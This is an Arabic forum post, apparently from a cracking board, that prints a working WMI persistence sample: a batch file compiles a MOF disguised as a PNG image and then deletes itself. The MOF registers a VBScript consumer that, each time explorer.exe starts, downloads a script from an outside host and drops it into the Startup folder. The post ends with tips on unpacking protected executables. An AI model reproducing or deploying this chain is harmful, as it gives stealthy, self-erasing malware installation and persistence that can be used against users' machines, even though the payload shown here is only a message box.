12-03-2022, 10:18 PM
(21-02-2022, 09:03 AM)abu_youssef كتب : هل جربت فكها؟
R.bat
set mypath=%cd%
set tcp = %tcp%
mofcomp tcp.png
del %mypath%\tcp.png
del %mypath%\R.bat
exit
TCP.png
#pragma AUTORECOVER
#pragma namespace ("\\\\.\\root\\subscription")
instance of ActiveScriptEventConsumer as $Cons
{
Name = "Microsoft";
ScriptingEngine = "VBScript";
ScriptText = "Function test() \n"
"dim xHttp \n"
" Set xHttp = createobject(\"Microsoft.XMLHTTP\") \n"
"dim bStrm\n"
"Set bStrm = createobject(\"Adodb.Stream\") \n"
"xHttp.Open \"GET\", \"https://boostcp.000webhostapp.com/msgbox.vbs\", False \n"
"xHttp.Send \n"
"with bStrm \n"
".type = 1 \n"
".open \n"
".write xHttp.responseBody \n"
".savetofile \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updata.vbs\", 2 \n"
"end with \n"
"end function \n"
"test\n";
};
instance of __EventFilter as $Filt
{
Name = "EF";
EventNamespace = "root\\cimv2";
QueryLanguage = "WQL";
Query = "SELECT * FROM __InstanceCreationEvent "
"WITHIN 1 WHERE TargetInstance ISA 'Win32_Process' "
"AND TargetInstance.Name = 'explorer.exe'";
};
instance of __FilterToConsumerBinding
{
Filter = $Filt;
Consumer = $Cons;
};
msgbox
Link:
https://boostcp.000webhostapp.com/msgbox.vbs
Message:msgbox"Risk"
(11-02-2022, 08:26 AM)abu_youssef كتب : استخدمت de4dot بكل اصداراته ولم استطع فك الحمايةلاينفع لان البرنامج ليس مبرمج ب: c# / .Net
(11-02-2022, 08:26 AM)abu_youssef كتب : ماهي الادوات المطلوبه لفك الحمايةollydbg
لايجاد نقطة الدخول الاصلية OEP
imprec import reconstructor
dump + إصلاح جدول الدوال المستوردة IAT
" اللهم أحسن خاتمتنا وأخرجنا من الدنيا علي خير"